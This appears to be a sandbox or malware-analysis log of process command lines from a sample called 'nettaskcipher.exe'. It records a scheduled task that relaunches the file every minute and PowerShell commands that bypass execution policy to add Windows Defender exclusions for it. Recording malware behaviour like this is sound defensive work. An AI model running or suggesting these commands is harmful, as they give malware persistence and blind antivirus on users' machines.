schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "nettaskcipher" /tr "C:\Users\test22\AppData\Roaming\nettaskcipher.exe"
2560powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'nettaskcipher.exe'
2636powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp\nettaskcipher.exe'
2812